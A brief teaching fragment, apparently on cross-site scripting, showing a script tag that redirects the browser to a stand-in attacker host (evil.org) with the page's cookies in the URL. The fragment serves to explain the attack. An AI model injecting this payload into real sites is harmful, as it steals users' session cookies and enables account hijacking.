A more realistic attack may steal the user's cookies

<script>
    document.location =
    'http://evil.org/?cookies=' +
    document.cookie
</script>